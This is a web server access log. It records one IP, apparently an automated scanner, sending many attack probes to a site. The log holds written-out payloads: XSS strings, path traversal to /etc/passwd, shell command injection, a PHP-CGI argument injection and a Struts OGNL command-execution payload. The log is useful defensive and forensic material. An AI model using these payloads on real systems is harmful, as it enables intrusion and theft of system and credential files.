195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:31 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:42 +0000] GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:42 +0000] GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:43 +0000] GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:47 +0000] GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:58:56 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:59:00 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:59:01 +0000] GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:59:13 +0000] GET /zabbix/index_sso.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:59:16 +0000] GET /zabbix/setup.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:59:21 +0000] POST /Token HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:59:22 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:22:59:23 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:22:59:25 +0000] POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:59:27 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:22:59:28 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [18/Nov/2024:22:59:28 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:59:29 +0000] GET /passwordrecovered.cgi?id=kyp44 HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:59:30 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [18/Nov/2024:22:59:36 +0000] GET /module/api.php?mobile/webNasIPS HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:59:37 +0000] GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 404 1162
- - - [18/Nov/2024:22:59:39 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:59:41 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:59:41 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:59:41 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:59:41 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:59:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:00:03 +0000] GET /index_sso.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:00:05 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
127.0.0.1 - - [18/Nov/2024:23:00:07 +0000] GET /server-status HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:00:09 +0000] GET /setup.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:00:13 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:00:14 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:00:15 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:00:16 +0000] POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:00:17 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:00:18 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:00:19 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [18/Nov/2024:23:00:20 +0000] GET /welcome.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:00:21 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:00:25 +0000] GET /threaddump HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:00:27 +0000] GET /trace HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:00:29 +0000] GET /env HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:00:30 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:00:31 +0000] GET /web.config.i18n.ashx?l=cdmyk&v=cdmyk HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:00:35 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:00:39 +0000] GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1 404 1187
- - - [18/Nov/2024:23:00:42 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:00:47 +0000] GET /www/setup.php HTTP/1.1 404 1091
83.212.98.101 - - [18/Nov/2024:23:00:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:00:52 +0000] GET /api/experimental/latest_runs HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:00:55 +0000] GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:00:58 +0000] GET /RestAPI/ImportTechnicians HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:01:01 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:01:03 +0000] GET /.DS_Store HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:01:03 +0000] POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:01:04 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:01:05 +0000] GET /_profiler/phpinfo?+--env=dev HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:01:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:01:07 +0000] GET /.bash_history HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:01:08 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:01:12 +0000] GET /actuator/threaddump HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:01:14 +0000] GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:01:15 +0000] GET /actuator/env HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:01:16 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:01:18 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:01:19 +0000] GET /access/set?param=enableapi&value=1 HTTP/1.1 404 1088
